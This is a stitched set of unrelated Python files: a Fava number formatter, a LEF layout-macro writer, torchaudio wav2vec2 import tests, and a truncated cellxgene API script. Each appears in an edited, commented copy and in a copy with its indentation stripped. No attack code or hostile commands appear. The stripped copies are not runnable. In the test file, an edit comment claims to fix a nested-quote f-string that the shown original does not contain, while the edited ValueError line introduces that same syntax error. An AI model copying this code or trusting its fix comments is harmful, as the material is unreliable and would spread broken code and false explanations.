            precision = ccontext.get_fractional(Precision.MOST_COMMON)
            if self.locale:
                pattern = copy.copy(self.locale.decimal_formats.get(None))
                pattern.frac_prec = (precision, precision)
            else:
                pattern = "{:." + str(precision) + "f}"
            self.patterns[currency] = pattern

    def __call__(self, value: Decimal, currency=None) -> str:
        """Format a decimal to the right number of decimal digits with locale.

        Arguments:
            value: A decimal number.
            currency: A currency string or None.

        Returns:
            A string, the formatted decimal.
        """
        pattern = self.patterns.get(currency, self.default_pattern)
        if not self.locale:
            return pattern.format(value)
        return pattern.apply(value, self.locale)
| """Formatting numbers."""
import copy
from typing import Dict
from babel.core import Locale # type: ignore
from babel.core import UnknownLocaleError
from beancount.core.display_context import Precision
from beancount.core.number import Decimal
from fava.core.fava_options import OptionError
from fava.core.module_base import FavaModule
class DecimalFormatModule(FavaModule):
"""Formatting numbers."""
def __init__(self, ledger) -> None:
super().__init__(ledger)
self.locale = None
self.patterns: Dict[str, str] = {}
self.default_pattern = "{:.2f}"
def load_file(self) -> None:
self.locale = None
locale_option = self.ledger.fava_options["locale"]
if self.ledger.options["render_commas"] and not locale_option:
locale_option = "en"
self.ledger.fava_options["locale"] = locale_option
if locale_option:
try:
self.locale = Locale.parse(locale_option)
except UnknownLocaleError:
self.locale = None
error = OptionError(
None,
f"Unknown locale: {self.ledger.fava_options['locale']}.",
None,
)
self.ledger.errors.append(error)
if self.locale:
self.default_pattern = copy.copy(
self.locale.decimal_formats.get(None)
)
self.default_pattern.frac_prec = (2, 2)
else:
self.default_pattern = "{:.2f}"
dcontext = self.ledger.options["dcontext"]
for currency, ccontext in dcontext.ccontexts.items():
precision = ccontext.get_fractional(Precision.MOST_COMMON)
if self.locale:
pattern = copy.copy(self.locale.decimal_formats.get(None))
pattern.frac_prec = (precision, precision)
else:
pattern = "{:." + str(precision) + "f}"
self.patterns[currency] = pattern
def __call__(self, value: Decimal, currency=None) -> str:
"""Format a decimal to the right number of decimal digits with locale.
Arguments:
value: A decimal number.
currency: A currency string or None.
Returns:
A string, the formatted decimal.
"""
pattern = self.patterns.get(currency, self.default_pattern)
if not self.locale:
return pattern.format(value)
return pattern.apply(value, self.locale)
|
import sys
import json
import collections
def gen_lef_data(data, fp, macro_name, cell_pin, bodyswitch):
    """Write one LEF MACRO section for the layout dict `data` to file `fp`.

    Pins listed in cell_pin become PIN sections ('B' is skipped when
    bodyswitch is 0); every remaining shape on a non-excluded layer is
    emitted as an obstruction.
    """
    def to_um(coord):
        # Scale raw integer coordinates by 1/10000 for LEF output.
        return "%.4f" % (coord / 10000.0)

    def emit_shape(obj):
        # One LAYER/RECT pair for a single terminal rectangle.
        fp.write(" LAYER %s ;\n" % obj['layer'])
        fp.write(" RECT %s %s %s %s ;\n" % tuple(to_um(c) for c in obj['rect']))

    exclude_layers = {"via0", "via1", "via2", "poly", "LISD", "SDT", "RVT",
                      "M0", "fin", "polycon", "GCUT", "active", "nselect", "pselect", "nwell"}
    fp.write("MACRO %s\n" % macro_name)
    fp.write(" ORIGIN 0 0 ;\n")
    fp.write(" FOREIGN %s 0 0 ;\n" % macro_name)
    fp.write(" SIZE %s BY %s ;\n" % (to_um(data['bbox'][2]), to_um(data['bbox'][3])))
    # O(npins * nsegments); could be O(npins + nsegments) by grouping
    # terminals by pin first.
    for pin_name in cell_pin:
        if pin_name == 'B' and bodyswitch == 0:
            continue
        fp.write(" PIN %s\n" % pin_name)
        fp.write(" DIRECTION INOUT ;\n")
        fp.write(" USE SIGNAL ;\n")
        fp.write(" PORT\n")
        for obj in data['terminals']:
            if obj.get('pin') == pin_name:
                emit_shape(obj)
        fp.write(" END\n")
        fp.write(" END %s\n" % pin_name)
    fp.write(" OBS\n")
    for obj in data['terminals']:
        if ('pin' not in obj or obj['pin'] not in cell_pin) and obj['layer'] not in exclude_layers:
            emit_shape(obj)
    fp.write(" END\n")
    fp.write("END %s\n" % macro_name)
def gen_lef_json_fp(json_fp, lef_fp, macro_name, cell_pin, bodyswitch):
    # Thin adapter: parse the JSON stream and delegate to gen_lef_data.
    gen_lef_data(json.load(json_fp), lef_fp, macro_name, cell_pin, bodyswitch)
def gen_lef_json(json_fn, lef_fn, macro_name, cell_pin, bodyswitch):
    """Read layout JSON from `json_fn` and write the LEF macro to `lef_fn`."""
    with open(json_fn, "rt") as json_fp, open(lef_fn, "wt") as lef_fp:
        # Bug fix: bodyswitch was accepted but not forwarded, so every call
        # raised TypeError (gen_lef_json_fp takes five arguments).
        gen_lef_json_fp(json_fp, lef_fp, macro_name, cell_pin, bodyswitch)
def json_lef(input_json, out_lef, cell_pin, bodyswitch, blockM, p):
    """Scale a placement JSON in place and emit "<out_lef>.lef" beside it.

    All bbox/rect coordinates are multiplied by 10 and written back to
    input_json; cell dimensions and pin centers are asserted against the
    M1/M2 grid pitches from `p`.

    Args:
        input_json: pathlib.Path of the layout JSON (rewritten with scaled coords).
        out_lef: macro name; also the stem of the emitted .lef file.
        cell_pin: iterable of pin names to export as PIN sections.
        bodyswitch: when 0, the 'B' pin is skipped.
        blockM: when 1, emit blanket M1-M3 obstructions over the Boundary
            shape instead of per-shape obstructions.
        p: layer-parameter mapping with per-layer 'Pitch' values and a
            get_lef_exclude() method.
    """
    exclude_layers = p.get_lef_exclude()
    macro_name = out_lef + '.lef'

    def s(x):
        return "%.4f" % (x/10000.0)

    # Start: This part converting all negative coordinates into positive
    with open(input_json, "rt") as fp:
        j = json.load(fp, object_pairs_hook=collections.OrderedDict)
    for i in range(4):
        j['bbox'][i] *= 10
    # Quote fix: {j["bbox"]} nested double quotes inside a double-quoted
    # f-string, a SyntaxError before Python 3.12.
    assert (j['bbox'][3]-j['bbox'][1]
            ) % p['M2']['Pitch'] == 0, f"Cell height not a multiple of the grid {j['bbox']}"
    assert (j['bbox'][2]-j['bbox'][0]
            ) % p['M1']['Pitch'] == 0, f"Cell width not a multiple of the grid {j['bbox']}"
    for obj in j['terminals']:
        for i in range(4):
            obj['rect'][i] *= 10
    with open(input_json, "wt") as fp:
        fp.write(json.dumps(j, indent=2) + '\n')
    # End:
    with open(input_json, "rt") as fp:
        j = json.load(fp)
    with open(input_json.parents[0] / macro_name, "wt") as fp:
        fp.write("MACRO %s\n" % out_lef)
        fp.write(" ORIGIN 0 0 ;\n")
        fp.write(" FOREIGN %s 0 0 ;\n" % out_lef)
        fp.write(" SIZE %s BY %s ;\n" % (s(j['bbox'][2]), s(j['bbox'][3])))
        cell_pin = list(cell_pin)
        for i in cell_pin:
            if i == 'B' and bodyswitch == 0:
                continue
            fp.write(" PIN %s\n" % i)
            fp.write(" DIRECTION INOUT ;\n")
            fp.write(" USE SIGNAL ;\n")
            fp.write(" PORT\n")
            for obj in j['terminals']:
                if 'pin' in obj and obj['pin'] == i:
                    fp.write(" LAYER %s ;\n" % obj['layer'])
                    fp.write(" RECT %s %s %s %s ;\n" %
                             tuple([s(x) for x in obj['rect']]))
                    # Check Pins are on grid or not
                    if obj['layer'] == 'M2':
                        cy = (obj['rect'][1]+obj['rect'][3])//2
                        # Message fix: report the remainder against the actual
                        # configured pitch instead of the hard-coded 84.
                        assert cy % p['M2']['Pitch'] == 0, (
                            f"M2 pin is not on grid {cy} {cy % p['M2']['Pitch']}")
                    if obj['layer'] == 'M1' or obj['layer'] == 'M3':
                        cx = (obj['rect'][0]+obj['rect'][2])//2
                        # Message fix: likewise, 80 was hard-coded here.
                        assert cx % p['M1']['Pitch'] == 0, (
                            f"M1 pin is not on grid {cx} {cx % p['M1']['Pitch']}")
            fp.write(" END\n")
            fp.write(" END %s\n" % i)
        fp.write(" OBS\n")
        cap_layers = ['M1', 'M2', 'M3']
        for obj in j['terminals']:
            if ('pin' not in obj or obj['pin'] not in cell_pin) and blockM == 0 and obj['layer'] not in exclude_layers:
                fp.write(" LAYER %s ;\n" % obj['layer'])
                fp.write(" RECT %s %s %s %s ;\n" %
                         tuple([s(x) for x in obj['rect']]))
            elif (blockM == 1) and obj['layer'] == 'Boundary':
                # Blanket obstructions over the whole boundary on M1-M3.
                for capL in cap_layers:
                    fp.write(" LAYER %s ;\n" % capL)
                    fp.write(" RECT %s %s %s %s ;\n" %
                             tuple([s(x) for x in obj['rect']]))
            else:
                pass
        fp.write(" END\n")
        fp.write("END %s\n" % out_lef)
| import sys
import json
import collections
def gen_lef_data(data, fp, macro_name, cell_pin, bodyswitch):
def s(x):
return "%.4f" % (x/10000.0)
fp.write("MACRO %s\n" % macro_name)
fp.write(" ORIGIN 0 0 ;\n")
fp.write(" FOREIGN %s 0 0 ;\n" % macro_name)
fp.write(" SIZE %s BY %s ;\n" % (s(data['bbox'][2]), s(data['bbox'][3])))
exclude_layers = {"via0", "via1", "via2", "poly", "LISD", "SDT", "RVT",
"M0", "fin", "polycon", "GCUT", "active", "nselect", "pselect", "nwell"}
# O(npins * nsegments) algorithm. Could be O(npins + nsegments) FIX!
for i in cell_pin:
if i == 'B' and bodyswitch==0:continue
fp.write(" PIN %s\n" % i)
#fp.write( " DIRECTION %s ;\n" % obj['ported'])
fp.write(" DIRECTION INOUT ;\n")
fp.write(" USE SIGNAL ;\n")
fp.write(" PORT\n")
for obj in data['terminals']:
if 'pin' in obj:
if obj['pin'] == i:
fp.write(" LAYER %s ;\n" % obj['layer'])
fp.write(" RECT %s %s %s %s ;\n" %
tuple([s(x) for x in obj['rect']]))
fp.write(" END\n")
fp.write(" END %s\n" % i)
fp.write(" OBS\n")
for obj in data['terminals']:
if ('pin' not in obj or obj['pin'] not in cell_pin) and obj['layer'] not in exclude_layers:
fp.write(" LAYER %s ;\n" % obj['layer'])
fp.write(" RECT %s %s %s %s ;\n" %
tuple([s(x) for x in obj['rect']]))
fp.write(" END\n")
fp.write("END %s\n" % macro_name)
def gen_lef_json_fp(json_fp, lef_fp, macro_name, cell_pin, bodyswitch):
gen_lef_data(json.load(json_fp), lef_fp, macro_name, cell_pin, bodyswitch)
def gen_lef_json(json_fn, lef_fn, macro_name, cell_pin, bodyswitch):
    """Read layout JSON from `json_fn` and write the LEF macro to `lef_fn`."""
    with open(json_fn, "rt") as json_fp, open(lef_fn, "wt") as lef_fp:
        # Bug fix: bodyswitch was accepted but not forwarded, so every call
        # raised TypeError (gen_lef_json_fp takes five arguments).
        gen_lef_json_fp(json_fp, lef_fp, macro_name, cell_pin, bodyswitch)
def json_lef(input_json, out_lef, cell_pin, bodyswitch, blockM, p):
exclude_layers = p.get_lef_exclude()
macro_name = out_lef + '.lef'
def s(x):
return "%.4f" % (x/10000.0)
# Start: This part converting all negative coordinates into positive
with open(input_json, "rt") as fp:
j = json.load(fp, object_pairs_hook=collections.OrderedDict)
for i in range(4):
j['bbox'][i] *= 10
assert (j['bbox'][3]-j['bbox'][1]
) % p['M2']['Pitch'] == 0, f"Cell height not a multiple of the grid {j['bbox']}"
assert (j['bbox'][2]-j['bbox'][0]
) % p['M1']['Pitch'] == 0, f"Cell width not a multiple of the grid {j['bbox']}"
for obj in j['terminals']:
for i in range(4):
obj['rect'][i] *= 10
with open(input_json, "wt") as fp:
fp.write(json.dumps(j, indent=2) + '\n')
# End:
with open(input_json, "rt") as fp:
j = json.load(fp)
with open(input_json.parents[0] / macro_name, "wt") as fp:
fp.write("MACRO %s\n" % out_lef)
fp.write(" ORIGIN 0 0 ;\n")
fp.write(" FOREIGN %s 0 0 ;\n" % out_lef)
fp.write(" SIZE %s BY %s ;\n" % (s(j['bbox'][2]), s(j['bbox'][3])))
cell_pin = list(cell_pin)
for i in cell_pin:
if i == 'B' and bodyswitch==0:continue
fp.write(" PIN %s\n" % i)
#fp.write( " DIRECTION %s ;\n" % obj['ported'])
fp.write(" DIRECTION INOUT ;\n")
fp.write(" USE SIGNAL ;\n")
fp.write(" PORT\n")
for obj in j['terminals']:
if 'pin' in obj and obj['pin'] == i:
fp.write(" LAYER %s ;\n" % obj['layer'])
fp.write(" RECT %s %s %s %s ;\n" %
tuple([s(x) for x in obj['rect']]))
# Check Pins are on grid or not
if obj['layer'] == 'M2':
cy = (obj['rect'][1]+obj['rect'][3])//2
assert cy % p['M2']['Pitch'] == 0, (
f"M2 pin is not on grid {cy} {cy%84}")
if obj['layer'] == 'M1' or obj['layer'] == 'M3':
cx = (obj['rect'][0]+obj['rect'][2])//2
assert cx % p['M1']['Pitch'] == 0, (
f"M1 pin is not on grid {cx} {cx%80}")
fp.write(" END\n")
fp.write(" END %s\n" % i)
fp.write(" OBS\n")
cap_layers = ['M1', 'M2', 'M3']
for obj in j['terminals']:
if ('pin' not in obj or obj['pin'] not in cell_pin) and blockM == 0 and obj['layer'] not in exclude_layers:
fp.write(" LAYER %s ;\n" % obj['layer'])
fp.write(" RECT %s %s %s %s ;\n" %
tuple([s(x) for x in obj['rect']]))
elif (blockM == 1) and obj['layer'] == 'Boundary':
for capL in cap_layers:
fp.write(" LAYER %s ;\n" % capL)
fp.write(" RECT %s %s %s %s ;\n" %
tuple([s(x) for x in obj['rect']]))
else:
pass
fp.write(" END\n")
fp.write("END %s\n" % out_lef)
|
import json
import torch
from parameterized import parameterized
from torchaudio.models.wav2vec2 import (
wav2vec2_base,
wav2vec2_large,
wav2vec2_large_lv60k,
)
from torchaudio.models.wav2vec2.utils import import_huggingface_model
from torchaudio_unittest.common_utils import (
get_asset_path,
skipIfNoModule,
TorchaudioTestCase,
)
def _load_config(*paths):
    """Load a Hugging Face config JSON from the test asset directory.

    `paths` are components under assets/wav2vec2/huggingface/; ".json" is
    appended to the resolved asset path.
    """
    # Quote fix: the original nested single quotes inside a single-quoted
    # f-string, a SyntaxError before Python 3.12.
    with open(f"{get_asset_path('wav2vec2', 'huggingface', *paths)}.json", "r") as file_:
        return json.load(file_)
def _name_func(testcase_func, i, param):
return f"{testcase_func.__name__}_{i}_{param[0][1].__name__}"
# Pretrained
# Reference Hugging Face configurations loaded from bundled JSON assets
# (presumably architectures == ["Wav2Vec2Model"]; see _get_model).
HF_BASE = _load_config("wav2vec2-base")
HF_LARGE = _load_config("wav2vec2-large")
HF_LARGE_LV60 = _load_config("wav2vec2-large-lv60")
HF_LARGE_XLSR_53 = _load_config("wav2vec2-large-xlsr-53")
HF_BASE_10K_VOXPOPULI = _load_config("wav2vec2-base-10k-voxpopuli")
# Finetuned
# (presumably architectures == ["Wav2Vec2ForCTC"]; see _get_model).
HF_BASE_960H = _load_config("wav2vec2-base-960h")
HF_LARGE_960H = _load_config("wav2vec2-large-960h")
HF_LARGE_LV60_960H = _load_config("wav2vec2-large-960h-lv60")
HF_LARGE_LV60_SELF_960H = _load_config("wav2vec2-large-960h-lv60-self")
HF_LARGE_XLSR_DE = _load_config("wav2vec2-large-xlsr-53-german")
# Config and corresponding factory functions
# Each entry pairs a Hugging Face config dict with the torchaudio factory
# that builds the equivalent architecture.
PRETRAIN_CONFIGS = parameterized.expand(
    [
        (HF_BASE, wav2vec2_base),
        (HF_LARGE, wav2vec2_large),
        (HF_LARGE_LV60, wav2vec2_large_lv60k),
        (HF_LARGE_XLSR_53, wav2vec2_large_lv60k),
        (HF_BASE_10K_VOXPOPULI, wav2vec2_base),
    ],
    name_func=_name_func,
)
FINETUNE_CONFIGS = parameterized.expand(
    [
        (HF_BASE_960H, wav2vec2_base),
        (HF_LARGE_960H, wav2vec2_large),
        (HF_LARGE_LV60_960H, wav2vec2_large_lv60k),
        (HF_LARGE_LV60_SELF_960H, wav2vec2_large_lv60k),
        (HF_LARGE_XLSR_DE, wav2vec2_large_lv60k),
    ],
    name_func=_name_func,
)
@skipIfNoModule("transformers")
class TestHFIntegration(TorchaudioTestCase):
"""Test the process of importing the models from Hugging Face Transformers
Test methods in this test suite check the following things
1. Models loaded with Hugging Face Transformers can be imported.
2. The same model can be recreated without Hugging Face Transformers.
"""
def _get_model(self, config):
# Helper function to avoid importing transformers on module scope.
# Normally, we use `is_module_available` helper function to check if
# the library is available, and import it on module scope if available.
# However, somehow, once "transformers" is imported, `is_module_available`
# starts to fail. Therefore, we defer importing "transformers" until
# the actual tests are started.
from transformers.models.wav2vec2 import (
Wav2Vec2Config,
Wav2Vec2Model,
Wav2Vec2ForCTC,
)
if config["architectures"] == ["Wav2Vec2Model"]:
return Wav2Vec2Model(Wav2Vec2Config(**config))
if config["architectures"] == ["Wav2Vec2ForCTC"]:
return Wav2Vec2ForCTC(Wav2Vec2Config(**config))
raise ValueError(f'Unexpected arch: {config['architectures']}')
def _test_import_pretrain(self, original, imported, config):
torch.manual_seed(0)
# FeatureExtractor
x = torch.randn(3, 1024)
ref = original.feature_extractor(x).transpose(1, 2)
hyp, _ = imported.feature_extractor(x, None)
self.assertEqual(ref, hyp)
# Feature projection
x = torch.randn(3, 10, config["conv_dim"][-1])
ref = original.feature_projection(x)[0]
hyp = imported.encoder.feature_projection(x)
self.assertEqual(ref, hyp)
# Convolutional Positional Encoder
x = torch.randn(3, 256, config["hidden_size"])
ref = original.encoder.pos_conv_embed(x)
hyp = imported.encoder.transformer.pos_conv_embed(x)
self.assertEqual(ref, hyp)
# Encoder Transformer Layer
for original_, imported_ in zip(original.encoder.layers, imported.encoder.transformer.layers):
b, l, e = 16, 3, config["hidden_size"]
x = torch.randn(b, l, e)
mask = torch.randn(b, 1, l, l)
(ref,) = original_(x, attention_mask=mask, output_attentions=False)
hyp = imported_(x, mask)
self.assertEqual(ref, hyp)
# The whole Encoder Transformer
b, l, e = 16, 3, config["hidden_size"]
x = torch.randn(b, l, e)
ref = original.encoder(x).last_hidden_state
hyp = imported.encoder.transformer(x)
self.assertEqual(ref, hyp)
def _test_import_finetune(self, original, imported, config):
# Aux
x = torch.randn(3, 10, config["hidden_size"])
ref = original.lm_head(x)
hyp = imported.aux(x)
self.assertEqual(ref, hyp)
# The whole model without mask
x = torch.randn(3, 1024)
ref = original(x).logits
hyp, _ = imported(x)
self.assertEqual(ref, hyp)
# The whole model without mask
batch_size, num_frames = 3, 1024
x = torch.randn(batch_size, num_frames)
ref = original(x).logits
hyp, _ = imported(x)
self.assertEqual(ref, hyp)
# The whole model with mask
batch_size, num_frames = 3, 1024
x = torch.randn(batch_size, num_frames)
lengths = torch.randint(
low=0,
high=num_frames,
size=[
batch_size,
],
)
mask = torch.arange(num_frames).expand(batch_size, num_frames) < lengths[:, None]
ref = original(x, attention_mask=mask).logits
hyp, output_lengths = imported(x, lengths)
for i, l in enumerate(output_lengths):
self.assertEqual(ref[i, :l, ...], hyp[i, :l, ...])
@PRETRAIN_CONFIGS
def test_import_pretrain(self, config, _):
"""wav2vec2 models from HF transformers can be imported and yields the same results"""
original = self._get_model(config).eval()
imported = import_huggingface_model(original).eval()
self._test_import_pretrain(original, imported, config)
@FINETUNE_CONFIGS
def test_import_finetune(self, config, _):
"""wav2vec2 models from HF transformers can be imported and yields the same results"""
original = self._get_model(config).eval()
imported = import_huggingface_model(original).eval()
self._test_import_pretrain(original.wav2vec2, imported, config)
self._test_import_finetune(original, imported, config)
def _test_recreate(self, imported, reloaded, config):
torch.manual_seed(0)
# FeatureExtractor
x = torch.randn(3, 1024)
ref, _ = imported.feature_extractor(x, None)
hyp, _ = reloaded.feature_extractor(x, None)
self.assertEqual(ref, hyp)
# Feature projection
x = torch.randn(3, 10, config["conv_dim"][-1])
ref = imported.encoder.feature_projection(x)
hyp = reloaded.encoder.feature_projection(x)
self.assertEqual(ref, hyp)
# Convolutional Positional Encoder
x = torch.randn(3, 256, config["hidden_size"])
ref = imported.encoder.transformer.pos_conv_embed(x)
hyp = reloaded.encoder.transformer.pos_conv_embed(x)
self.assertEqual(ref, hyp)
# Encoder Transformer Layer
for imported_, reloaded_ in zip(imported.encoder.transformer.layers, reloaded.encoder.transformer.layers):
b, l, e = 16, 3, config["hidden_size"]
x = torch.randn(b, l, e)
mask = torch.randn(b, 1, l, l)
ref = imported_(x, mask)
hyp = reloaded_(x, mask)
self.assertEqual(ref, hyp)
# The whole Encoder Transformer
# TODO: Add mask pattern. Expected mask shapes and values are different.
b, l, e = 16, 3, config["hidden_size"]
x = torch.randn(b, l, e)
mask = torch.randn(b, 1, l, l)
ref = imported.encoder.transformer(x)
hyp = reloaded.encoder.transformer(x)
self.assertEqual(ref, hyp)
# Aux
if imported.aux is not None:
x = torch.randn(3, 10, config["hidden_size"])
ref = imported.aux(x)
hyp = reloaded.aux(x)
self.assertEqual(ref, hyp)
# The whole model
x = torch.randn(3, 1024)
ref, _ = imported(x)
hyp, _ = reloaded(x)
self.assertEqual(ref, hyp)
@PRETRAIN_CONFIGS
def test_recreate_pretrain(self, config, factory_func):
"""Imported models can be recreated via a factory function without Hugging Face transformers."""
imported = import_huggingface_model(self._get_model(config)).eval()
reloaded = factory_func()
reloaded.load_state_dict(imported.state_dict())
reloaded.eval()
self._test_recreate(imported, reloaded, config)
@FINETUNE_CONFIGS
def test_recreate_finetune(self, config, factory_func):
"""Imported models can be recreated via a factory function without Hugging Face transformers."""
imported = import_huggingface_model(self._get_model(config)).eval()
reloaded = factory_func(aux_num_out=imported.aux.out_features)
reloaded.load_state_dict(imported.state_dict())
reloaded.eval()
self._test_recreate(imported, reloaded, config)
| import json
import torch
from parameterized import parameterized
from torchaudio.models.wav2vec2 import (
wav2vec2_base,
wav2vec2_large,
wav2vec2_large_lv60k,
)
from torchaudio.models.wav2vec2.utils import import_huggingface_model
from torchaudio_unittest.common_utils import (
get_asset_path,
skipIfNoModule,
TorchaudioTestCase,
)
def _load_config(*paths):
with open(f'{get_asset_path("wav2vec2", "huggingface", *paths)}.json', "r") as file_:
return json.load(file_)
def _name_func(testcase_func, i, param):
return f"{testcase_func.__name__}_{i}_{param[0][1].__name__}"
# Pretrained
HF_BASE = _load_config("wav2vec2-base")
HF_LARGE = _load_config("wav2vec2-large")
HF_LARGE_LV60 = _load_config("wav2vec2-large-lv60")
HF_LARGE_XLSR_53 = _load_config("wav2vec2-large-xlsr-53")
HF_BASE_10K_VOXPOPULI = _load_config("wav2vec2-base-10k-voxpopuli")
# Finetuned
HF_BASE_960H = _load_config("wav2vec2-base-960h")
HF_LARGE_960H = _load_config("wav2vec2-large-960h")
HF_LARGE_LV60_960H = _load_config("wav2vec2-large-960h-lv60")
HF_LARGE_LV60_SELF_960H = _load_config("wav2vec2-large-960h-lv60-self")
HF_LARGE_XLSR_DE = _load_config("wav2vec2-large-xlsr-53-german")
# Config and corresponding factory functions
PRETRAIN_CONFIGS = parameterized.expand(
[
(HF_BASE, wav2vec2_base),
(HF_LARGE, wav2vec2_large),
(HF_LARGE_LV60, wav2vec2_large_lv60k),
(HF_LARGE_XLSR_53, wav2vec2_large_lv60k),
(HF_BASE_10K_VOXPOPULI, wav2vec2_base),
],
name_func=_name_func,
)
FINETUNE_CONFIGS = parameterized.expand(
[
(HF_BASE_960H, wav2vec2_base),
(HF_LARGE_960H, wav2vec2_large),
(HF_LARGE_LV60_960H, wav2vec2_large_lv60k),
(HF_LARGE_LV60_SELF_960H, wav2vec2_large_lv60k),
(HF_LARGE_XLSR_DE, wav2vec2_large_lv60k),
],
name_func=_name_func,
)
@skipIfNoModule("transformers")
class TestHFIntegration(TorchaudioTestCase):
"""Test the process of importing the models from Hugging Face Transformers
Test methods in this test suite check the following things
1. Models loaded with Hugging Face Transformers cane be imported.
2. The same model can be recreated without Hugging Face Transformers.
"""
def _get_model(self, config):
# Helper function to avoid importing transformers on module scope.
# Normally, we use `is_module_available` helper function to check if
# the library is available, and import it on module scope if available.
# However, somehow, once "transformers" is imported, `is_module_available`
# starts to fail. Therefore, we defer importing "transformers" until
# the actual tests are started.
from transformers.models.wav2vec2 import (
Wav2Vec2Config,
Wav2Vec2Model,
Wav2Vec2ForCTC,
)
if config["architectures"] == ["Wav2Vec2Model"]:
return Wav2Vec2Model(Wav2Vec2Config(**config))
if config["architectures"] == ["Wav2Vec2ForCTC"]:
return Wav2Vec2ForCTC(Wav2Vec2Config(**config))
raise ValueError(f'Unexpected arch: {config["architectures"]}')
def _test_import_pretrain(self, original, imported, config):
torch.manual_seed(0)
# FeatureExtractor
x = torch.randn(3, 1024)
ref = original.feature_extractor(x).transpose(1, 2)
hyp, _ = imported.feature_extractor(x, None)
self.assertEqual(ref, hyp)
# Feature projection
x = torch.randn(3, 10, config["conv_dim"][-1])
ref = original.feature_projection(x)[0]
hyp = imported.encoder.feature_projection(x)
self.assertEqual(ref, hyp)
# Convolutional Positional Encoder
x = torch.randn(3, 256, config["hidden_size"])
ref = original.encoder.pos_conv_embed(x)
hyp = imported.encoder.transformer.pos_conv_embed(x)
self.assertEqual(ref, hyp)
# Encoder Transformer Layer
for original_, imported_ in zip(original.encoder.layers, imported.encoder.transformer.layers):
b, l, e = 16, 3, config["hidden_size"]
x = torch.randn(b, l, e)
mask = torch.randn(b, 1, l, l)
(ref,) = original_(x, attention_mask=mask, output_attentions=False)
hyp = imported_(x, mask)
self.assertEqual(ref, hyp)
# The whole Encoder Transformer
b, l, e = 16, 3, config["hidden_size"]
x = torch.randn(b, l, e)
ref = original.encoder(x).last_hidden_state
hyp = imported.encoder.transformer(x)
self.assertEqual(ref, hyp)
def _test_import_finetune(self, original, imported, config):
# Aux
x = torch.randn(3, 10, config["hidden_size"])
ref = original.lm_head(x)
hyp = imported.aux(x)
self.assertEqual(ref, hyp)
# The whole model without mask
x = torch.randn(3, 1024)
ref = original(x).logits
hyp, _ = imported(x)
self.assertEqual(ref, hyp)
# The whole model without mask
batch_size, num_frames = 3, 1024
x = torch.randn(batch_size, num_frames)
ref = original(x).logits
hyp, _ = imported(x)
self.assertEqual(ref, hyp)
# The whole model with mask
batch_size, num_frames = 3, 1024
x = torch.randn(batch_size, num_frames)
lengths = torch.randint(
low=0,
high=num_frames,
size=[
batch_size,
],
)
mask = torch.arange(num_frames).expand(batch_size, num_frames) < lengths[:, None]
ref = original(x, attention_mask=mask).logits
hyp, output_lengths = imported(x, lengths)
for i, l in enumerate(output_lengths):
self.assertEqual(ref[i, :l, ...], hyp[i, :l, ...])
@PRETRAIN_CONFIGS
def test_import_pretrain(self, config, _):
"""wav2vec2 models from HF transformers can be imported and yields the same results"""
original = self._get_model(config).eval()
imported = import_huggingface_model(original).eval()
self._test_import_pretrain(original, imported, config)
@FINETUNE_CONFIGS
def test_import_finetune(self, config, _):
"""wav2vec2 models from HF transformers can be imported and yields the same results"""
original = self._get_model(config).eval()
imported = import_huggingface_model(original).eval()
self._test_import_pretrain(original.wav2vec2, imported, config)
self._test_import_finetune(original, imported, config)
def _test_recreate(self, imported, reloaded, config):
torch.manual_seed(0)
# FeatureExtractor
x = torch.randn(3, 1024)
ref, _ = imported.feature_extractor(x, None)
hyp, _ = reloaded.feature_extractor(x, None)
self.assertEqual(ref, hyp)
# Feature projection
x = torch.randn(3, 10, config["conv_dim"][-1])
ref = imported.encoder.feature_projection(x)
hyp = reloaded.encoder.feature_projection(x)
self.assertEqual(ref, hyp)
# Convolutional Positional Encoder
x = torch.randn(3, 256, config["hidden_size"])
ref = imported.encoder.transformer.pos_conv_embed(x)
hyp = reloaded.encoder.transformer.pos_conv_embed(x)
self.assertEqual(ref, hyp)
# Encoder Transformer Layer
for imported_, reloaded_ in zip(imported.encoder.transformer.layers, reloaded.encoder.transformer.layers):
b, l, e = 16, 3, config["hidden_size"]
x = torch.randn(b, l, e)
mask = torch.randn(b, 1, l, l)
ref = imported_(x, mask)
hyp = reloaded_(x, mask)
self.assertEqual(ref, hyp)
# The whole Encoder Transformer
# TODO: Add mask pattern. Expected mask shapes and values are different.
b, l, e = 16, 3, config["hidden_size"]
x = torch.randn(b, l, e)
mask = torch.randn(b, 1, l, l)
ref = imported.encoder.transformer(x)
hyp = reloaded.encoder.transformer(x)
self.assertEqual(ref, hyp)
# Aux
if imported.aux is not None:
x = torch.randn(3, 10, config["hidden_size"])
ref = imported.aux(x)
hyp = reloaded.aux(x)
self.assertEqual(ref, hyp)
# The whole model
x = torch.randn(3, 1024)
ref, _ = imported(x)
hyp, _ = reloaded(x)
self.assertEqual(ref, hyp)
@PRETRAIN_CONFIGS
def test_recreate_pretrain(self, config, factory_func):
"""Imported models can be recreated via a factory function without Hugging Face transformers."""
imported = import_huggingface_model(self._get_model(config)).eval()
reloaded = factory_func()
reloaded.load_state_dict(imported.state_dict())
reloaded.eval()
self._test_recreate(imported, reloaded, config)
@FINETUNE_CONFIGS
def test_recreate_finetune(self, config, factory_func):
"""Imported models can be recreated via a factory function without Hugging Face transformers."""
imported = import_huggingface_model(self._get_model(config)).eval()
reloaded = factory_func(aux_num_out=imported.aux.out_features)
reloaded.load_state_dict(imported.state_dict())
reloaded.eval()
self._test_recreate(imported, reloaded, config)
|
import boto3
from uuid import uuid4
from collections import defaultdict
import time
from pandas import DataFrame
import datetime
import numpy as np
import pandas
import requests
pandas.set_option(
"display.max_rows", None, "display.max_columns", None, "display.width", 1000, "display.max_colwidth", None
)
def get_json_response(collection_id):
collection_info_response = requests.get(f"https://api.cellxgene.cziscience.com/dp/v1/collections/{collection_id}")
collection_info = collection_info_response.json()
return collection_info
def construct_map_of_dataset_assets_to_collection_and_dataset_information_from_apis():
# Fetch list of collection ids
collections_response = requests.get("https://api.cellxgene.cziscience.com/dp/v1/collections")
collections = collections_response.json()["collections"]
collection_ids = [collection.get("id") for collection in collections]
all_collection_responses = {}
for collection_id in collection_ids:
all_collection_responses[collection_id] = get_json_response(collection_id)
dataset_name_by_s3_uri = {}
collection_id_by_s3_uri = {}
for collection_id, collection_information in all_collection_responses.items():
datasets_in_collection = collection_information.get("datasets")
for dataset in datasets_in_collection:
dataset_id = dataset.get("id")
dataset_name = dataset.get("name")
dataset_assets = dataset.get("dataset_assets")
for dataset_asset in dataset_assets:
uri = dataset_asset.get("s3_uri")
uri = uri.replace("s3://corpora-data-prod/", "")
if uri in dataset_name_by_s3_uri:
